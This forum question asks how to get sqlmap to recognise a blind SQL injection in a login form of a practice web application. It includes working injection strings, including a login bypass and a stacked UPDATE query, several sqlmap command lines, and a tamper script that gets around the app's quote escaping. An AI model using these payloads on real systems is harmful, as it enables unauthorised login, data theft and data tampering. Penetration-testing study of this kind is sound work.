I am looking for some help on how to get the best out of sqlmap. I am practising on a web application that runs the following query when the login form is submitted:
SELECT * FROM Users WHERE username = '<form-username-value>' AND passhash = '5baa61e49cb93f3f0682250b6cf8331b7ee68fd8';
The web application substitutes all single quotes in the provided <form-username-value> with backslash + single quote prior to executing the SQL.
Webform injections that work:
\' or 1=1; #
and
\' or 1=1; update Products set name="new-name" where id=346892; #
These are blind injections. I know the stacked SQL commands are working because I can see changes to the rendered text on the website.
Is there a way to let sqlmap know of a working injection and then have it use its blind querying skills to enumerate the database?
I have tried and tried to get sqlmap to recognise this injection because I would like to use its brilliant abilities to pull data out of the database with its time-based queries.
Here are a few commands I've tried:
$ /home/kali/src/sqlmap-dev/sqlmap.py -u 'https://hostname/app/doLogin.action' --data="username=x&password=x" -p username --prefix="'" --suffix=";#" --tamper=escape-and-subst-single-quotes.py --dbms mysql --level=3 --risk=3 --batch --code=301 -v 6
and
$ /home/kali/src/sqlmap-dev/sqlmap.py -u 'https://hostname/app/doLogin.action' --data="username=x&password=x" -p username --prefix="'" --suffix=";#" --tamper=escape-and-subst-single-quotes.py --dbms mysql --level=3 --risk=3 --batch --titles --string='APPNAME' -v 6
and
$ /home/kali/src/sqlmap-dev/sqlmap.py -u 'https://hostname/app/doLogin.action' --data="username=*&password=x" -p username --prefix="'" --suffix=";#" --tamper=escape-and-subst-single-quotes.py --dbms mysql --level=3 --risk=3 --batch --code=301 -v 6
I have created this tamper script (escape-and-subst-single-quotes.py) to put a backslash in front of the first single quote found and change the rest into double quotes. It has the following line of python
return payload.replace("'", '"').replace('"',"\\'",1)
Looking at the sqlmap logs I'm happy with the queries being sent to the server and I can see it succeeded with
[13:01:52] [PAYLOAD] x\' OR 1=1;#
The TRAFFIC OUT shows
username=x%5C%27%20OR%201%3D1%3B%23&password=x
It seems as though the problem is with sqlmap realising when it has been successful.
If I try that same payload in a web browser it works and logs me in. The developer tools show the first response to the POST is a 301 with a Location: /app, then there's a 302 GET with Location: /app/, then there's a 200 GET with the logged-in page content.
I've tried many variants of --code=301, --code=302, --string, --not-string, --titles and just can't get it right. I think this is probably the area where I've made a mistake. For instance, I've tried --titles --string="APPNAME" where the logged in page is the only one that has 'APPNAME' as its title, the login form page has a title of 'Log in' and if there's an SQL error that page has a title of 'SQL Exception'
